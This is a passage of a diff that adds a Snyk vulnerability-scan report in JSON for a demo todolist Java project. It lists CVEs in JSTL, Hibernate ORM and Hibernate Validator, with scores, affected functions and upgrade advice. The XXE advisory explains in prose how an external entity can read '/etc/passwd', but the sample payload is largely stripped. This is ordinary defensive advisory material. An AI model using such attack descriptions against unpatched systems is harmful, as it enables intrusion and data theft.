"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } 
+ ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + "type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + 
"[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. 
The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + 
], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + 
"url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. 
This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": 
"snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": 
"https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" 
+ ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + 
"references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": 
false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": 